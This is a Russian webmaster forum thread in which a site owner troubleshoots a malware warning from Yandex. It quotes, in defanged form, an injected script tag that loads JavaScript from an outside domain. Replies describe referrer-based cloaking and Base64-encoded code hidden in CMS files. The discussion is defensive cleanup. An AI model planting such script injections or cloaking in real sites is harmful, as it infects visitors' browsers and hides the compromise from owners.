- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Уважаемые.
Вроде не первый день в этой сфере, но я ничего не понимаю!
В Я.Вебмастере мне пишется, что на сайте двдрипер.ру есть вирус. Я его там не нашел, заказал перепроверку, все равно видит вирус. Я написал в саппорт, в ответ получил следующее сообщение:
[script language="JavaScript" charset="windows-1251" rel="nofollow" src="h**p://maroder.info/js/if.php?id=1548"][/script]
Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.
Данный код появляется в первой строке любой страницы сайта, перед открывающим тегом html.
Пожалуйста, проверьте файлы Вашего сайта на предмет заражения.
Я не нашел ни на одной странице подобного кода. Заказав еще одну перепроверку - снова указывает на вирус.
Помогите разобраться, теряю посетителей. То же самое есть еще на одном сайте.
При переходе с ПС иногда данная строчка появляется в самом начале страницы.
Это присходит только когда значение рефера указывает на переход с ПС.
При прямом заходе на сайт "вредоносный код" не появляется. Всё указывает на то, что сайт заражён. Ну и на всякий случай тыц.
Если у Вас есть на сайте форум, то скорее всего там - в файлах шаблонах сборки страниц. Если же нет, то надо вручную все смотреть - каждую страницу. А так - сочувствую. Сам один раз вот так же как и Вы на сайте партнера искал подобное ...
А я код вижу. Может злодеи Вашему IP его не отдают? Может зайти через анонимайзер?
[ATTACH]85721[/ATTACH]
И кстати, да, при прямом заходе на сайт его нет.
Проверьте наличие новых картинок в папках с шаблонами.
А ещё он может быть зашифрован в Base64 и стоять на видном месте в шаблоне, но стандартными средствами вы этот код не увидите.
Ловил этот самый вирус, он появляется при открывании страницы в самом вверху над основным кодом.
В файлах я его не нашел, проверил все что можно, он как-то генерировался скриптом, не понятно откуда. Смог убрать обновлением всех файлов.
Залили его через Шел в cms DLE. 😡
нужно смотреть шаблон и файлы которые инклудяться в нем
Блин, значит все таки и правда вирус есть. Пошел рыть файлы! Спасибо!
mr.Cent добавил 11.03.2011 в 12:52
Кажись убрал! Может кто посмотреть, появляется ли код? Я просто его и раньше не видел...
Кажись убрал! Может кто посмотреть, появляется ли код?
У меня нет кода теперь.
На будущее. У кого движки DLE. Злоумышленники прописали закодированный по Base64 код в файле /egine/data/db_config.php. Не пойму где дыра пока, стоит лицензионный 9.2. Будем искать. Спасибо всем за наводку. :)
Дыра может быть не в самом движке, а в базе, в фтп, еще много где. Я думаю вы уже сменили все пароли, которые только возможно, если нет, сделайте это немедленно.